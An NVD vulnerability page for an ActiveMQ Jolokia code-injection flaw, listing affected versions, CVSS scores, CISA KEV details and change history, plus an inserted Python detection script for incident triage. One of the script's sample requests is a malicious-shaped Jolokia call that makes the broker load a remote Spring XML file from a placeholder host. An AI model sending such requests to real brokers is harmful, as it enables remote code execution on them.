NVD - CVE-2026-34197
CVE-2026-34197 Detail
Description
Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ.

Apache ActiveMQ Classic exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including
BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).

An authenticated attacker can invoke these operations with a crafted discovery URI that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext.
Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().

This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3.

Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue.
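The description above gives a responder two concrete things to check: whether a broker's version falls inside the affected ranges, and whether Jolokia traffic to /api/jolokia/ is invoking BrokerService.addNetworkConnector or addConnector with a vm:// URI that carries a brokerConfig parameter. The script below is an added example written for this page, not code from NVD, Apache, or the advisory. It assumes the standard Jolokia POST request shape (a JSON object or array with "type", "mbean", "operation" and "arguments" keys) and the usual ActiveMQ broker MBean name pattern; the sample request bodies are constructed for illustration and are not captured traffic or a verified exploit payload.

```python
"""Triage helpers for CVE-2026-34197 (Apache ActiveMQ Classic, Jolokia exec on
BrokerService.addNetworkConnector / addConnector).

  is_affected(version)         -> is this broker version inside the advisory's
                                  ranges (before 5.19.4, or 6.0.0 up to but
                                  excluding 6.2.3)?
  flag_jolokia_request(body)   -> findings for one Jolokia POST body: exec calls
                                  to the two risky operations, rated "high" when
                                  the argument is a vm: URI with brokerConfig.
"""
import json
import re

# Advisory ranges as (lower inclusive, upper exclusive) version tuples.
AFFECTED_RANGES = [((0, 0, 0), (5, 19, 4)), ((6, 0, 0), (6, 2, 3))]

# Operations named in the advisory. Jolokia may report them with a signature
# suffix, e.g. "addNetworkConnector(java.lang.String)".
RISKY_OPERATIONS = {"addNetworkConnector", "addConnector"}

# Constructed sample bodies (not real traffic); MBean name follows the usual
# ActiveMQ pattern, 203.0.113.10 is a documentation-only address.
SAMPLE_REQUESTS = {
    "read_attribute": (
        '{"type":"read","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
        '"attribute":"TotalEnqueueCount"}'
    ),
    "add_connector_tcp": (
        '{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
        '"operation":"addConnector(java.lang.String)","arguments":["tcp://0.0.0.0:61617"]}'
    ),
    "network_connector_brokerconfig": (
        '[{"type":"exec","mbean":"org.apache.activemq:type=Broker,brokerName=localhost",'
        '"operation":"addNetworkConnector(java.lang.String)",'
        '"arguments":["vm://probe?brokerConfig=xbean:http://203.0.113.10/ctx.xml"]}]'
    ),
}


def parse_version(version):
    """'5.18.3' or '6.1.0-SNAPSHOT' -> (5, 18, 3) / (6, 1, 0); missing patch -> 0."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) if part is not None else 0 for part in m.groups())


def is_affected(version):
    ver = parse_version(version)
    return any(lo <= ver < hi for lo, hi in AFFECTED_RANGES)


def _operation_name(operation):
    # Strip a Jolokia signature suffix such as "(java.lang.String)".
    return operation.split("(", 1)[0]


def flag_jolokia_request(body):
    """Return a list of findings for one Jolokia request body (JSON text or parsed).

    A Jolokia POST may carry a single request object or an array of them. Every
    exec of the two operations on an org.apache.activemq MBean is reported; a
    vm: URI whose query carries brokerConfig (the shape the advisory describes,
    which makes the broker load a Spring XML context) is rated "high".
    """
    requests = json.loads(body) if isinstance(body, str) else body
    if isinstance(requests, dict):
        requests = [requests]
    findings = []
    for req in requests:
        if str(req.get("type", "")).lower() != "exec":
            continue
        mbean = req.get("mbean", "")
        op = _operation_name(req.get("operation", ""))
        if not mbean.startswith("org.apache.activemq:") or op not in RISKY_OPERATIONS:
            continue
        for arg in req.get("arguments", []):
            if not isinstance(arg, str):
                continue
            lowered = arg.lower()
            severity = "high" if lowered.startswith("vm:") and "brokerconfig=" in lowered else "info"
            findings.append({"severity": severity, "mbean": mbean, "operation": op, "argument": arg})
    return findings


if __name__ == "__main__":
    for ver in ("5.18.6", "5.19.4", "6.2.2", "6.2.3"):
        print(f"{ver}: {'AFFECTED' if is_affected(ver) else 'not affected'}")
    for name, body in SAMPLE_REQUESTS.items():
        print(name, flag_jolokia_request(body))
```

In practice the request bodies would come from a reverse proxy or web-console access log that records POST payloads; the version check is meant to be run over an inventory of broker versions. Both checks are deliberately narrow: they cover the two operations and the vm:/brokerConfig pattern the advisory names and nothing broader.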
Metrics
NVD enrichment efforts reference publicly available information to associate vector strings. CVSS information contributed by other sources is also displayed.
CVSS 4.0 Severity and Vector Strings:
NIST (NVD): N/A, NVD assessment not yet provided.
CVSS 3.x Severity and Vector Strings:
NIST (NVD): Base Score N/A, NVD assessment not yet provided.
ADP (CISA-ADP): Base Score 8.8 HIGH, Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 2.0 Severity and Vector Strings:
NIST (NVD): Base Score N/A, NVD assessment not yet provided.
References to Advisories, Solutions, and Tools
URL | Source(s) | Tag(s)
http://www.openwall.com/lists/oss-security/2026/04/06/3 | CVE | Mailing List, Third Party Advisory
https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt | Apache Software Foundation | Vendor Advisory
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34197 | CISA-ADP | US Government Resource
This CVE is in CISA's Known Exploited Vulnerabilities Catalog
Reference CISA's BOD 22-01 and Known Exploited Vulnerabilities Catalog for further guidance and requirements.
Vulnerability Name: Apache ActiveMQ Improper Input Validation Vulnerability
Date Added: 04/16/2026
Due Date: 04/30/2026
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Weakness Enumeration
CWE-ID | CWE Name | Source
CWE-20 | Improper Input Validation | Apache Software Foundation
CWE-94 | Improper Control of Generation of Code ('Code Injection') | Apache Software Foundation
Known Affected Software Configurations
Configuration 1 (OR):
cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* versions up to (excluding) 5.19.4
cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* versions from (including) 6.0.0 up to (excluding) 6.2.3
cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:* versions up to (excluding) 5.19.4
cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:* versions from (including) 6.0.0 up to (excluding) 6.2.3
Change History
8 change records found
Initial Analysis by NIST, 4/16/2026 3:59:38 PM
Added CPE Configuration (OR):
cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* versions up to (excluding) 5.19.4
cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* versions from (including) 6.0.0 up to (excluding) 6.2.3
cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:* versions up to (excluding) 5.19.4
cpe:2.3:a:apache:activemq_broker:*:*:*:*:*:*:*:* versions from (including) 6.0.0 up to (excluding) 6.2.3
Added Reference Type: Apache Software Foundation: https://activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt, Types: Vendor Advisory
Added Reference Type: CISA-ADP: https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-34197, Types: US Government Resource
Added Reference Type: CVE: http://www.openwall.com/lists/oss-security/2026/04/06/3, Types: Mailing List, Third Party Advisory
CVE Modified by CISA-ADP, 4/16/2026 3:16:33 PM
Added Reference
CVE CISA KEV Update by Cybersecurity and Infrastructure Security Agency (CISA) U.S. Civilian Government, 4/16/2026 3:00:02 PM
Added Date Added: 2026-04-16
Added Due Date: 2026-04-30
Added Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Added Vulnerability Name: Apache ActiveMQ Improper Input Validation Vulnerability
CVE Modified by Apache Software Foundation, 4/08/2026 12:16:25 PM
Changed Description: the affected-products sentence, which previously read "This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: ." (the Apache ActiveMQ range was empty), now reads "This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ All: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: before 5.19.4, from 6.0.0 before 6.2.3." The remainder of the description is unchanged and matches the current text above.
CVE Modified by Apache Software Foundation, 4/08/2026 5:16:21 AM
Changed Description: the upgrade recommendation, which previously read "Users are recommended to upgrade to version 5.19.5 or 6.2.3, which fixes the issue.", now reads "Users are recommended to upgrade to version 5.19.4 or 6.2.3, which fixes the issue." The remainder of the description is unchanged; in both versions the affected-products sentence still ended "Apache ActiveMQ: ." with the Apache ActiveMQ range empty.
CVE Modified by CISA-ADP, 4/07/2026 10:16:22 AM
Added CVSS V3.1: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE Modified by CVE, 4/07/2026 5:16:20 AM
Added Reference
New CVE Received from Apache Software Foundation, 4/07/2026 5:16:20 AM
Added Description: the initial text, identical to the current description above except that the affected-products sentence read "This issue affects Apache ActiveMQ Broker: before 5.19.4, from 6.0.0 before 6.2.3; Apache ActiveMQ: ." (Apache ActiveMQ range empty) and the upgrade recommendation named version 5.19.5 rather than 5.19.4.
Added CWE: CWE-20
Added CWE: CWE-94
Added Reference
Quick Info
CVE Dictionary Entry: CVE-2026-34197
NVD Published Date: 04/07/2026
NVD Last Modified: 04/16/2026
Source: Apache Software Foundation